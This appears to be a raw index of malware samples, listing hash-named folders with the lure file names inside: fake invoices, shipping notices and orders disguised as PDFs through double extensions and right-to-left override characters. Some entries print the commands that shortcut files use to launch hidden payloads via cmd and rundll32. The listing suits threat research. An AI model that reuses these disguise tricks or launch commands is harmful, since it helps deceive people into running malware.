.\74432992f9fdea71055840a1635be7670cb127e8d56732ce6cb717a55eb674c574432992f9fdea71055840a1635be7670cb127e8d56732ce6cb717a55eb674c5_1661938885['.\74432992f9fdea71055840a1635be7670cb127e8d56732ce6cb717a55eb674c5_1661938885/dazement.exe']
.\7591d06e5117b9bd1c30a80e98b286b19c142c8ed3d112c39fbcd2cee49041847591d06e5117b9bd1c30a80e98b286b19c142c8ed3d112c39fbcd2cee4904184_1661938885['.\7591d06e5117b9bd1c30a80e98b286b19c142c8ed3d112c39fbcd2cee4904184_1661938885/vugYXIwz1MreL5B.exe']
.\76028080a3726185d0ed96fbbac7d14f69d954e60f8cb43ac4f09e1232fc5a5476028080a3726185d0ed96fbbac7d14f69d954e60f8cb43ac4f09e1232fc5a54_1661938885['.\76028080a3726185d0ed96fbbac7d14f69d954e60f8cb43ac4f09e1232fc5a54_1661938885/Tarjouspyyntö-Lasku 17-08-2022.exe']
.\7c1620504cdd8b4e042493ca5ec4f9941764a0a3e3b7f6eee5c8cc1aca665f9b7c1620504cdd8b4e042493ca5ec4f9941764a0a3e3b7f6eee5c8cc1aca665f9b_1661938885['.\7c1620504cdd8b4e042493ca5ec4f9941764a0a3e3b7f6eee5c8cc1aca665f9b_1661938885/082653-5354cod_wire_transfer_email_xls-2022_08_14.exe']
.\7c5c0551633c740c1d168c01f00fc1a8fabf2a90512a9093cce47decd62ba6367c5c0551633c740c1d168c01f00fc1a8fabf2a90512a9093cce47decd62ba636_1661938885['.\7c5c0551633c740c1d168c01f00fc1a8fabf2a90512a9093cce47decd62ba636_1661938885/File.exe;1']
.\7d185e99f61ed17e1843cfb89c6e510b24373a0cb4f677b97388af012a45a3e07d185e99f61ed17e1843cfb89c6e510b24373a0cb4f677b97388af012a45a3e0_1661938885['.\7d185e99f61ed17e1843cfb89c6e510b24373a0cb4f677b97388af012a45a3e0_1661938885/juyUoWwUf7fs624.exe']
.\7efe37e9add266607a526764355c2a6a0a7f99d31a737da06630c3d41940c7dd7efe37e9add266607a526764355c2a6a0a7f99d31a737da06630c3d41940c7dd_1661938885['.\7efe37e9add266607a526764355c2a6a0a7f99d31a737da06630c3d41940c7dd_1661938885/New Order TI3 134324_pdf .exe']
.\80ec436ab35dc25bc5e0acc056bea50c61774a92c3806aa9e5ab5ae5c5a4d7df80ec436ab35dc25bc5e0acc056bea50c61774a92c3806aa9e5ab5ae5c5a4d7df_1661938885"['.\80ec436ab35dc25bc5e0acc056bea50c61774a92c3806aa9e5ab5ae5c5a4d7df_1661938885/Подтвердить заказ-1969_V5 # 8346,pdf.exe']"
.\8124e764dcfcf3349c2793a70b756d8b04db0fddac1af8d58f8a16533197f9be8124e764dcfcf3349c2793a70b756d8b04db0fddac1af8d58f8a16533197f9be_1661938885['.\8124e764dcfcf3349c2793a70b756d8b04db0fddac1af8d58f8a16533197f9be_1661938885/Re_01373.exe;1']
.\817a26f7f20e9b790560bf4f9b365591dd0cd11c7ccd8e2a6b2500d288dea228817a26f7f20e9b790560bf4f9b365591dd0cd11c7ccd8e2a6b2500d288dea228_1661938885['.\817a26f7f20e9b790560bf4f9b365591dd0cd11c7ccd8e2a6b2500d288dea228_1661938885/Order_59385592485.exe;1']
.\822b515719f3fe89ba4a9071dd12269cbbb0af9cd03e897ccfd3e52b30e8378b822b515719f3fe89ba4a9071dd12269cbbb0af9cd03e897ccfd3e52b30e8378b_1661938885"['.\822b515719f3fe89ba4a9071dd12269cbbb0af9cd03e897ccfd3e52b30e8378b_1661938885/DHL_119040 recibo,pdf.exe']"
.\82c5cfb82912e1da0d388fb2428bc644b001908a27c0dc287ce72d6c2939a89f82c5cfb82912e1da0d388fb2428bc644b001908a27c0dc287ce72d6c2939a89f_1661938885['.\82c5cfb82912e1da0d388fb2428bc644b001908a27c0dc287ce72d6c2939a89f_1661938885/readme.txt.cmd']
.\82ee783f3cae0f1d955414d38e99f6229b95f46a194e181bbf7fac261014833982ee783f3cae0f1d955414d38e99f6229b95f46a194e181bbf7fac2610148339_1661938885"['.\82ee783f3cae0f1d955414d38e99f6229b95f46a194e181bbf7fac2610148339_1661938885/CBI_TAX518014569364736 \u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202efdp.exe', '.\82ee783f3cae0f1d955414d38e99f6229b95f46a194e181bbf7fac2610148339_1661938885/CBI_TAX518014850158635 \u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202efdp.exe']"
.\8330a22dc0d05221740fed56f79e621cff84da4bada55ae28af13d105b0b4d3a8330a22dc0d05221740fed56f79e621cff84da4bada55ae28af13d105b0b4d3a_1661938885['.\8330a22dc0d05221740fed56f79e621cff84da4bada55ae28af13d105b0b4d3a_1661938885/INQ-985346.exe']
.\84a0325ec4136d0ad9113e0958a444a2ab584eac87fd4a109fc264294a5e264884a0325ec4136d0ad9113e0958a444a2ab584eac87fd4a109fc264294a5e2648_1661938885['.\84a0325ec4136d0ad9113e0958a444a2ab584eac87fd4a109fc264294a5e2648_1661938885/20-00030.exe']
.\84f3603900d8150778ae112604b9867bec6d8bf355e563ed13d22c20d3dee9ba84f3603900d8150778ae112604b9867bec6d8bf355e563ed13d22c20d3dee9ba_1661938885['.\84f3603900d8150778ae112604b9867bec6d8bf355e563ed13d22c20d3dee9ba_1661938885/TNT INVOICE.exe']
.\85129fcac431f611dd0ac4d878ea3c03cf68893b4934f87e54c132be5c6ad50485129fcac431f611dd0ac4d878ea3c03cf68893b4934f87e54c132be5c6ad504_1661938885['.\85129fcac431f611dd0ac4d878ea3c03cf68893b4934f87e54c132be5c6ad504_1661938885/exercices conjugaison anglais pdf-3079733bf4.exe']
.\86185d63eaf64c0cee8beafdb9c3782c5999e9af9539f3b5697b139cf520653b86185d63eaf64c0cee8beafdb9c3782c5999e9af9539f3b5697b139cf520653b_1661938885['.\86185d63eaf64c0cee8beafdb9c3782c5999e9af9539f3b5697b139cf520653b_1661938885/Solicitud de cotización P.0-202208100237RO.exe']
.\86e4fd79dc1eb10ba2e6b7f2c1418791e80e1b0543c32dd36f907b5989721bde86e4fd79dc1eb10ba2e6b7f2c1418791e80e1b0543c32dd36f907b5989721bde_1661938885['.\86e4fd79dc1eb10ba2e6b7f2c1418791e80e1b0543c32dd36f907b5989721bde_1661938885/RFQ- 2022081509470429.exe']
.\880035cd5be51bb434357b54647e2164f5df932713d871f42386f81c46a182d8880035cd5be51bb434357b54647e2164f5df932713d871f42386f81c46a182d8_1661938885['.\880035cd5be51bb434357b54647e2164f5df932713d871f42386f81c46a182d8_1661938885/Nirotec Scan_01082022085619_pdf.exe']
.\886f3eb226dabacd956d96a26ec5b3b60f08e600e044183c91afcbeaa66ff5b3886f3eb226dabacd956d96a26ec5b3b60f08e600e044183c91afcbeaa66ff5b3_1661938885
.\8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c_1661938885"['.\8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c_1661938885/12v3q3Ee.png', '.\8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c_1661938885/for_you_presentation-130722.9319.png.lnk', '.\8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c_1661938885/mfQjc9Cy.dll']".\8934f58e586f4264f834864e5a3aa03607b50104f1c99c404370acb4178c2d9c_1661938885/for_you_presentation-130722.9319.png.lnkC:\Windows\System32\cmd.exe"/c ""start 12v3q3Ee.png && start rundll32 mfQjc9Cy.dll
.\8b11f585fcc288af301cc4692c4a6893eefda16cf02c709834308982087d4a1d8b11f585fcc288af301cc4692c4a6893eefda16cf02c709834308982087d4a1d_1661938885"['.\8b11f585fcc288af301cc4692c4a6893eefda16cf02c709834308982087d4a1d_1661938885/RFQ 103404_00108172022,pdf.exe']"
.\8c5dcb0850b7af9a117dcc493f55b4b8ef20379c22670ab91ba2de0f61841d218c5dcb0850b7af9a117dcc493f55b4b8ef20379c22670ab91ba2de0f61841d21_1661938885['.\8c5dcb0850b7af9a117dcc493f55b4b8ef20379c22670ab91ba2de0f61841d21_1661938885/0010082022.exe']
.\8c75eba91ce1a569055db3d083ff412823e2aaef6dd343fd5c3e804f85588bf48c75eba91ce1a569055db3d083ff412823e2aaef6dd343fd5c3e804f85588bf4_1661938885"['.\8c75eba91ce1a569055db3d083ff412823e2aaef6dd343fd5c3e804f85588bf4_1661938885/Attached Order Receip, pdf']"
.\8cd970d161a0dd5d8d176e4ef222519a6764bd45ff3408aebe57f4a2437187c28cd970d161a0dd5d8d176e4ef222519a6764bd45ff3408aebe57f4a2437187c2_1661938885['.\8cd970d161a0dd5d8d176e4ef222519a6764bd45ff3408aebe57f4a2437187c2_1661938885/RFQ-MEJOR PRECIO PARA LOS ARTÍCULOS.exe']
.\8d201be45ab190a74a16a0cac0ddb7b36d5bd012001c55b49ed3b0cbd3ac32ab8d201be45ab190a74a16a0cac0ddb7b36d5bd012001c55b49ed3b0cbd3ac32ab_1661938885['.\8d201be45ab190a74a16a0cac0ddb7b36d5bd012001c55b49ed3b0cbd3ac32ab_1661938885/RFQ_2022_PROJECT.exe']
.\8d59f820245ba6962b86ea21ce2cb856d0416ae84e87de47baccba0d2bf2f9078d59f820245ba6962b86ea21ce2cb856d0416ae84e87de47baccba0d2bf2f907_1661938885['.\8d59f820245ba6962b86ea21ce2cb856d0416ae84e87de47baccba0d2bf2f907_1661938885/DOCUMENT-AUG-17-2022.exe']
.\8dc5747a116e3725139e744b0743625e87cd1acbe882aa88c88a992896e029098dc5747a116e3725139e744b0743625e87cd1acbe882aa88c88a992896e02909_1661938885['.\8dc5747a116e3725139e744b0743625e87cd1acbe882aa88c88a992896e02909_1661938885/RFQ-MEJOR PRECIO PARA LOS ARTÍCULOS.exe']
.\8f13d2008597b59a522d4706337d9319a59e57eb3e49529a3b46a7d5ffd2596e8f13d2008597b59a522d4706337d9319a59e57eb3e49529a3b46a7d5ffd2596e_1661938885['.\8f13d2008597b59a522d4706337d9319a59e57eb3e49529a3b46a7d5ffd2596e_1661938885/ORDER_CF2022-24400_pdf.exe']
.\8fd64da18fbbd5865463cda2b322f39f7307bfde404d3edc93b8777b5cc33d0d8fd64da18fbbd5865463cda2b322f39f7307bfde404d3edc93b8777b5cc33d0d_1661938885['.\8fd64da18fbbd5865463cda2b322f39f7307bfde404d3edc93b8777b5cc33d0d_1661938885/Scan Doc_202656845_pdf .exe']
.\9160665801d9961ad5833efa167efd743e4f41c5803e3c6105052e12767960339160665801d9961ad5833efa167efd743e4f41c5803e3c6105052e1276796033_1661938885['.\9160665801d9961ad5833efa167efd743e4f41c5803e3c6105052e1276796033_1661938885/POEZD_RA.EXE;1']
.\9242cdd6f980e6fa6c5f398369984373c3df2aa5325b053ff3435d694ef8a3029242cdd6f980e6fa6c5f398369984373c3df2aa5325b053ff3435d694ef8a302_1661938885['.\9242cdd6f980e6fa6c5f398369984373c3df2aa5325b053ff3435d694ef8a302_1661938885/SEPTEMBER ORDER Lemonconcentrate 48857574884_html .vbs']
.\9262445975fcd47addb17666c5c3d3ddd12bd760aee5e4443562b78b6da677af9262445975fcd47addb17666c5c3d3ddd12bd760aee5e4443562b78b6da677af_1661938885"['.\9262445975fcd47addb17666c5c3d3ddd12bd760aee5e4443562b78b6da677af_1661938885/Belaquilon ЗАКАЗ НА ПОКУПКУ_U00162,pdf.exe']"
.\928ff782b5cc6ba7e7c2ca57d36129f60d4caf178bb1e1c637c5c4e56a395415928ff782b5cc6ba7e7c2ca57d36129f60d4caf178bb1e1c637c5c4e56a395415_1661938885['.\928ff782b5cc6ba7e7c2ca57d36129f60d4caf178bb1e1c637c5c4e56a395415_1661938885/FILE66373555466455_773883837736.vbs']
.\92d32e8ddfbc3a357ec7b25075c881052c153e505b678d26a76fe9d0aed63a6492d32e8ddfbc3a357ec7b25075c881052c153e505b678d26a76fe9d0aed63a64_1661938885['.\92d32e8ddfbc3a357ec7b25075c881052c153e505b678d26a76fe9d0aed63a64_1661938885/fiiii.exe;1']
.\93e7716177f240d6052ef8450d7112470332a11edf48721665c5755fcaba3ba193e7716177f240d6052ef8450d7112470332a11edf48721665c5755fcaba3ba1_1661938885['.\93e7716177f240d6052ef8450d7112470332a11edf48721665c5755fcaba3ba1_1661938885/55ddd602cc282b8a72-816779ddd662cc282b8a72-8166-9ceb-898064d602cc.vbs']
.\942ac4b6b8889d7834f6a9255d823145762a7f52a315654ad58f772cbc3aa5df942ac4b6b8889d7834f6a9255d823145762a7f52a315654ad58f772cbc3aa5df_1661938885['.\942ac4b6b8889d7834f6a9255d823145762a7f52a315654ad58f772cbc3aa5df_1661938885/附上我们的订单文件TU3206,pdf.exe']
.\95f690fc084d36b3648d5b83d230969aea2e2ecc6d9810c966b286d9e0144c7695f690fc084d36b3648d5b83d230969aea2e2ecc6d9810c966b286d9e0144c76_1661938885['.\95f690fc084d36b3648d5b83d230969aea2e2ecc6d9810c966b286d9e0144c76_1661938885/Doc67906.pif']
.\9628c36ead0a23b052738fd177a7933e781d891948e9bb804cb9f7b1f68ae0a79628c36ead0a23b052738fd177a7933e781d891948e9bb804cb9f7b1f68ae0a7_1661938885"['.\9628c36ead0a23b052738fd177a7933e781d891948e9bb804cb9f7b1f68ae0a7_1661938885/RFQ_AP65425652_032421 urgentes,pdf.exe']"
.\97853d26922d123c6a41c87aaca6e6bcc0d35201a0ebf36a41eba16f31e617c297853d26922d123c6a41c87aaca6e6bcc0d35201a0ebf36a41eba16f31e617c2_1661938885['.\97853d26922d123c6a41c87aaca6e6bcc0d35201a0ebf36a41eba16f31e617c2_1661938885/Urgent First Order.exe']
.\991b0a3c57fc782f9dfe1766dac655d32140d7f5159ef047be7ab6218010119a991b0a3c57fc782f9dfe1766dac655d32140d7f5159ef047be7ab6218010119a_1661938885['.\991b0a3c57fc782f9dfe1766dac655d32140d7f5159ef047be7ab6218010119a_1661938885/QPF1ISWO.EXE;1']
.\9ab9f06cd57365080063a41d890ad4ce0cf140b1c4c2f82703d8cf9dc0008f679ab9f06cd57365080063a41d890ad4ce0cf140b1c4c2f82703d8cf9dc0008f67_1661938885['.\9ab9f06cd57365080063a41d890ad4ce0cf140b1c4c2f82703d8cf9dc0008f67_1661938885/New Order-RFQ-2022290816-Pdf.exe']
.\9ac80eb866d23af3153f23a3bd1bf3c3827fd410791852923fd85b7122be7fd49ac80eb866d23af3153f23a3bd1bf3c3827fd410791852923fd85b7122be7fd4_1661938885['.\9ac80eb866d23af3153f23a3bd1bf3c3827fd410791852923fd85b7122be7fd4_1661938885/Specification dignia Order Q3 FTD5253534 .vbs']
.\9b291caf425809855ac459b2d7903c23f4d85051bfaaddbd10926532d5d3e4f19b291caf425809855ac459b2d7903c23f4d85051bfaaddbd10926532d5d3e4f1_1661938885['.\9b291caf425809855ac459b2d7903c23f4d85051bfaaddbd10926532d5d3e4f1_1661938885/DHL_DELIVERY_NOTICE.vbs']
.\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e39b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885"['.\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885/OnlineReviewStep3.exe', '.\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885/STATEMENT-View.pdf.lnk', '.\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885/Start.vbs', '.\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885/icon.ico']".\9b3b350bd46b8b6f2ce191f2c85b5a2b7cb0898fc96aea285002d9682f94b2e3_1661938885/STATEMENT-View.pdf.lnkWindows/system32/cmd.exe/c start Start.vbs
.\9b93f1e3233906496039c15f67d4c14459ea898385697bca73fb630559a9f6b69b93f1e3233906496039c15f67d4c14459ea898385697bca73fb630559a9f6b6_1661938885['.\9b93f1e3233906496039c15f67d4c14459ea898385697bca73fb630559a9f6b6_1661938885/DHL Shipment Notification.pdf.exe']
.\9ce84380614d0eb61fd657c42593e5cd91d122f614c00c5edea65142419518549ce84380614d0eb61fd657c42593e5cd91d122f614c00c5edea6514241951854_1661938885"['.\9ce84380614d0eb61fd657c42593e5cd91d122f614c00c5edea6514241951854_1661938885/app.dll', '.\9ce84380614d0eb61fd657c42593e5cd91d122f614c00c5edea6514241951854_1661938885/pss10r.chm']"
.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885"['.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/NSudo.json', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/NSudoLC.exe', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/NSudoLC.pdb', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/PowerRun.exe', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/ReadMe.txt', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/WinDefenderTuner.exe', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/defender_off.reg', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/defender_on.reg', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/real_off.reg', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/real_on.reg', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/reestr.reg', '.\a04c1eb5919e538fb9636d2f5dfef867ec08761a9737cbc961a4c184c7660059_1661938885/WinDefenderTuner/reset.bat']"
.\a0dfe57c163d561c0f048df47350d2fdecd3c2059992b4269a2eb3b73636bfa0a0dfe57c163d561c0f048df47350d2fdecd3c2059992b4269a2eb3b73636bfa0_1661938885['.\a0dfe57c163d561c0f048df47350d2fdecd3c2059992b4269a2eb3b73636bfa0_1661938885/98231415.exe']
.\a0e7ad871d3e584a53b5ce183407b55a33471da3952967bc54b44ee4866e5d6ba0e7ad871d3e584a53b5ce183407b55a33471da3952967bc54b44ee4866e5d6b_1661938885['.\a0e7ad871d3e584a53b5ce183407b55a33471da3952967bc54b44ee4866e5d6b1661938885/QUOTE_REQUEST_H238765_Pdf.exe']
.\a223b34212a56a35fa2534ff509798625eadf5e689b1718afe395966f09e14f9a223b34212a56a35fa2534ff509798625eadf5e689b1718afe395966f09e14f9_1661938885['.\a223b34212a56a35fa2534ff509798625eadf5e689b1718afe395966f09e14f9_1661938885/Doc12768.exe;1']
.\a488ce2ac4b6a470aa6abfffb32afb8735b30a992ba8352d7954397eadb28b66a488ce2ac4b6a470aa6abfffb32afb8735b30a992ba8352d7954397eadb28b66_1661938885['.\a488ce2ac4b6a470aa6abfffb32afb8735b30a992ba8352d7954397eadb28b66_1661938885/9210_331_xls.exe']
.\a699a8938e37743d854b7bdb27f1ee21f61ff6c4a8d29e41e5cf47770d9dd7b3a699a8938e37743d854b7bdb27f1ee21f61ff6c4a8d29e41e5cf47770d9dd7b3_1661938885['.\a699a8938e37743d854b7bdb27f1ee21f61ff6c4a8d29e41e5cf47770d9dd7b3_1661938885/RFQ-MEJOR PRECIO PARA LOS ARTÍCULOS.exe']
.\a77e13e5e260aa464f4d45ba9b81f2af2daf6e487b8926e0661949541a5d33e3a77e13e5e260aa464f4d45ba9b81f2af2daf6e487b8926e0661949541a5d33e3_1661938885"['.\a77e13e5e260aa464f4d45ba9b81f2af2daf6e487b8926e0661949541a5d33e3_1661938885/Tenorshare_12in1_Keygen_v1.3_By_DFoX.zip', '.\a77e13e5e260aa464f4d45ba9b81f2af2daf6e487b8926e0661949541a5d33e3_1661938885/setup.exe']"
.\a7bcbdd0894b9e05c77d0d57a61c046d5dec32d529cea50e5a28486424ebbc39a7bcbdd0894b9e05c77d0d57a61c046d5dec32d529cea50e5a28486424ebbc39_1661938885['.\a7bcbdd0894b9e05c77d0d57a61c046d5dec32d529cea50e5a28486424ebbc39_1661938885/Pakkumistaotlus 2022 - 08 - 16.exe']
.\a7e7df8e369050508196c44dfccb5f586c7b155cda40689b0a07cbc36508c9cda7e7df8e369050508196c44dfccb5f586c7b155cda40689b0a07cbc36508c9cd_1661938885['.\a7e7df8e369050508196c44dfccb5f586c7b155cda40689b0a07cbc36508c9cd_1661938885/Document BT24_PDF.exe']
.\a8a726c188f2b331c70035c09508d5a80b5508631f66478f517883f54c4e9e1da8a726c188f2b331c70035c09508d5a80b5508631f66478f517883f54c4e9e1d_1661938885['.\a8a726c188f2b331c70035c09508d5a80b5508631f66478f517883f54c4e9e1d_1661938885/ID_MPBQOKJLOY(8-25-2021).xlsx.vbs']
.\a91d6039fa1b404736971bdfbc187fc3f3e4b7fe1aebabce771f1d7a11a4dba8a91d6039fa1b404736971bdfbc187fc3f3e4b7fe1aebabce771f1d7a11a4dba8_1661938885['.\a91d6039fa1b404736971bdfbc187fc3f3e4b7fe1aebabce771f1d7a11a4dba8_1661938885/JULY2022 SOA.exe']
.\a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6_1661938885"['.\a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6_1661938885/des.exe', '.\a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6_1661938885/economic assistance.lnk', '.\a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6_1661938885/ofcpipc.dll']".\a9d967243678d31ba5027d1802fbc1606c10b7743d6d6851eddc32b9281eb2f6_1661938885/economic assistance.lnkWindows/System32/cmd.exe/c des.exe
.\abbb905c284641d81003a296a48f832f61b4fa34a4239dd278fbe0757695777cabbb905c284641d81003a296a48f832f61b4fa34a4239dd278fbe0757695777c_1661938885"['.\abbb905c284641d81003a296a48f832f61b4fa34a4239dd278fbe0757695777c_1661938885/RFQ AG588393528,pdf.exe']"
.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dcadbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885"['.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/invoice-not-paid-date08-08-22-pdf.lnk', '.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/at/alsoAtLikeTakeWe.txt', '.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/at/but.txt', '.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/at/time.gif', '.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/at/whatAlsoOfWhoHis.js', '.\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/at/whatTheirAlsoAI.bat']".\adbf394ce2e83086eaa8cde6dabeb774a9189f4a3fdea176b9ef3b39455936dc_1661938885/invoice-not-paid-date08-08-22-pdf.lnkat/whatTheirAlsoAI.bat
.\afb5941236143017c51584a2189c45a00d8a9fe53886798b118582f5544305f2afb5941236143017c51584a2189c45a00d8a9fe53886798b118582f5544305f2_1661938885['.\afb5941236143017c51584a2189c45a00d8a9fe53886798b118582f5544305f2_1661938885/Ordine 18082022 FRA. BEN. snc di BENAGLIA ROBERTO.exe']
.\b064141db8ea6a9e1d2130c470a01794f6e957bc3c043cac329e2a660ce61a5db064141db8ea6a9e1d2130c470a01794f6e957bc3c043cac329e2a660ce61a5d_1661938885['.\b064141db8ea6a9e1d2130c470a01794f6e957bc3c043cac329e2a660ce61a5d_1661938885/503-14-7201D_Pohjapiirustus_TALO_A.pdf.lnk;1']
.\b18663c381c6b8b4e04686f7b4a6c313755b71f0aed3caad384b622fe06a5bf4b18663c381c6b8b4e04686f7b4a6c313755b71f0aed3caad384b622fe06a5bf4_1661938885['.\b18663c381c6b8b4e04686f7b4a6c313755b71f0aed3caad384b622fe06a5bf4_1661938885/Nirotec Scan_01082022085619_pdf.exe']
.\b1d1c06a52a31d41439d4610fbec8465f33e93f4e10261e0507858c317e5085cb1d1c06a52a31d41439d4610fbec8465f33e93f4e10261e0507858c317e5085c_1661938885
.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885"['.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/Personal data.lnk', '.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/two/getUp.js', '.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/two/thisThing.bat', '.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/two/wouldIn.txt', '.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/two/year.gif', '.\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/two/your.txt']".\b1dd92682e676b64a63216fb3297db2e3c0c975e5d0fcc44f57be4cc25eb57d1_1661938885/Personal data.lnktwo/thisThing.bat
.\b318d6ff02618a2cc9d2f9abda582c78ba91bd3f8b02e3157b20d6a7cccaa0e3b318d6ff02618a2cc9d2f9abda582c78ba91bd3f8b02e3157b20d6a7cccaa0e3_1661938885['.\b318d6ff02618a2cc9d2f9abda582c78ba91bd3f8b02e3157b20d6a7cccaa0e3_1661938885/TNT AWB.exe']
.\b3962e6c3ea27d1a4533e0fa3480aaf15334de01056ecacb1522fc72e4162ce2b3962e6c3ea27d1a4533e0fa3480aaf15334de01056ecacb1522fc72e4162ce2_1661938885"['.\b3962e6c3ea27d1a4533e0fa3480aaf15334de01056ecacb1522fc72e4162ce2_1661938885/Belaquilon ЗАКАЗ НА ПОКУПКУ_U00162,pdf.exe']"
.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885"['.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885/CCleanerBundle-560-Setup.exe', '.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885/Ke Telegram Software.url', '.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885/kuyhAa.Me.url', '.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885/kygn.exe', '.\b4d51d1f3052d8c74472f163d901aedd16f8f37258985e8bc56e51e05f0cd230_1661938885/www.kuyhAa.Me.url']"
.\b5e11f4c48d4558574225db70b6d3182ff6e129ee914e29b1d38f32442d5c842b5e11f4c48d4558574225db70b6d3182ff6e129ee914e29b1d38f32442d5c842_1661938885"['.\b5e11f4c48d4558574225db70b6d3182ff6e129ee914e29b1d38f32442d5c842_1661938885/RFQ urgente de OTEC CFY65674543,pdf.exe']"
.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935dab6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885"['.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/documents.lnk', '.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/into/likeSome.bat', '.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/into/make.jpg', '.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/into/meNot.js', '.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/into/orFor.txt', '.\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/into/want.png']".\b6969fa4b5190f3a0b8b4c0b1946602cfe4d6c2aa64af84352f2d51a7de935da_1661938885/documents.lnkinto/likeSome.bat
.\b731ba94fe468d867c217afb679576a67c04dec45057dc82be455d03dcd1e190b731ba94fe468d867c217afb679576a67c04dec45057dc82be455d03dcd1e190_1661938885['.\b731ba94fe468d867c217afb679576a67c04dec45057dc82be455d03dcd1e190_1661938885/5223_xls.exe']
.\b76e36d7d29691c1cebd1195a6bc67ff4eec6f26d1e27cffeebd09a83ab8c6feb76e36d7d29691c1cebd1195a6bc67ff4eec6f26d1e27cffeebd09a83ab8c6fe_1661938885['.\b76e36d7d29691c1cebd1195a6bc67ff4eec6f26d1e27cffeebd09a83ab8c6fe_1661938885/VPO_SP.9686_Flex_rev_2_BL653368.exe']
